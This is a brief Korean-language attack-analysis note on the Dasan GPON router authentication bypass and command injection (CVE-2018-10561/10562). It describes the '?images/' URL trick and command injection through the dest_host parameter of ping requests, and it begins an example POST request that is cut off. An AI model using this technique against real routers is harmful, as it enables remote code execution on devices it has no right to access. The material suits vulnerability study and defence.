웹 공격 분석

Dasan GPON Routers Authentication Bypass CMD Injection - /GponForm/diag_FORM 또는 .html 등의 객체에서 잘못 처리되 인증이 우회되는 취약점 - 취약한 라우터를 검색한 후 URL에 ?images/ 문자열을 추가해 요청 - diag_action = ping 요청의 dest_host 매개 변수에 명령어 삽입 - 라우터는 ping 결과를 /tmp에 저장하고 사용자가 .html, diag_FORM 을 다시 방문 할 때 사용자에게 전송 - 공격 성공시 사용자는 시스템에서 임의의 코드를 실행 CVE-2018-10561 CVE-2018-10562 POST /GponForm/diag_Form?images/ HTTP/1.1 Host: 1.1.1.1 Conte..